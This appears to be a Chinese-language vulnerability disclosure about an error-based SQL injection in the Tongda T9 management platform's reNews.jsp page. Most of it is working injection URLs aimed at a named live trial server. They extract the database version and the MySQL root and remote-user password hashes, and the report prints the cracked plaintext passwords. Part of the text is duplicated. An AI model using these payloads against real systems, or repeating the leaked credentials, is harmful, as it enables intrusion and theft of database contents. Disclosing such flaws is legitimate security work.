VULHUB ™

### 简要描述： 通达T9智能管理平台标准版存在SQL注入漏洞。 ### 详细说明： 通达T9智能管理平台标准版的在线试用地址是http://t9.go2oa.com:86/t9/login.jsp，登陆后，core/funcs/news/show/reNews.jsp页面存在mysql报错注入漏洞，可以获取系统数据信息。 1、http://t9.go2oa.com/t9/core/funcs/news/show/reNews.jsp?seqId=eqId=15' union select '1' from (select count(*),concat(floor(rand(0)*2),0x3a,(select @@version from flow_sort limit 3,1))a from flow_sort group by a)b where 1=1 or '1'='1 [<img src="https://images.seebug.org/upload/201403/17215954973d49f93a6c13ea75782cbd1c44334a.png" alt="20140317215933.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/17215954973d49f93a6c13ea75782cbd1c44334a.png) 2、爆root用户密码 http://t9.go2oa.com/t9/core/funcs/news/show/reNews.jsp?seqId=eqId=15' union select '1' from (select count(*),concat(floor(rand(0)*2),0x3a,(select concat(host,user,password) from mysql.user limit 0,1))a from flow_sort group by a)b where 1=1 or '1'='1 [<img...

### 简要描述： 通达T9智能管理平台标准版存在SQL注入漏洞。 ### 详细说明： 通达T9智能管理平台标准版的在线试用地址是http://t9.go2oa.com:86/t9/login.jsp，登陆后，core/funcs/news/show/reNews.jsp页面存在mysql报错注入漏洞，可以获取系统数据信息。 1、http://t9.go2oa.com/t9/core/funcs/news/show/reNews.jsp?seqId=eqId=15' union select '1' from (select count(*),concat(floor(rand(0)*2),0x3a,(select @@version from flow_sort limit 3,1))a from flow_sort group by a)b where 1=1 or '1'='1 [<img src="https://images.seebug.org/upload/201403/17215954973d49f93a6c13ea75782cbd1c44334a.png" alt="20140317215933.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/17215954973d49f93a6c13ea75782cbd1c44334a.png) 2、爆root用户密码 http://t9.go2oa.com/t9/core/funcs/news/show/reNews.jsp?seqId=eqId=15' union select '1' from (select count(*),concat(floor(rand(0)*2),0x3a,(select concat(host,user,password) from mysql.user limit 0,1))a from flow_sort group by a)b where 1=1 or '1'='1 [<img src="https://images.seebug.org/upload/201403/172204136c42a2dc084f7ed464b6427590c7cb9c.png" alt="20140317220353.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/172204136c42a2dc084f7ed464b6427590c7cb9c.png) 成功爆出root的口令91AF99F23C3D4ED85140D100433725DFA52BECEE，破解后为：myoa888。 [<img src="https://images.seebug.org/upload/201403/1722092523c80934ac9823dcca54602c606d5470.png" alt="20140317220907.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/1722092523c80934ac9823dcca54602c606d5470.png) 3、爆mysql可远程连接的用户密码 http://t9.go2oa.com/t9/core/funcs/news/show/reNews.jsp?seqId=eqId=15' union select '1' from (select count(*),concat(floor(rand(0)*2),0x3a,(select concat(host,user,password) from mysql.user limit 3,1))a from flow_sort group by a)b where 1=1 or '1'='1 [<img src="https://images.seebug.org/upload/201403/1722130768d9df2b63b00ea06db0ac66b6f5bc69.png" alt="20140317221251.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/1722130768d9df2b63b00ea06db0ac66b6f5bc69.png) 破解后为：cms6_8。 其他数据就不爆了，该注入点权限挺高，可以获取数据库中的所有数据。 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201403/17215954973d49f93a6c13ea75782cbd1c44334a.png" alt="20140317215933.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/17215954973d49f93a6c13ea75782cbd1c44334a.png) [<img src="https://images.seebug.org/upload/201403/172204136c42a2dc084f7ed464b6427590c7cb9c.png" alt="20140317220353.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/172204136c42a2dc084f7ed464b6427590c7cb9c.png)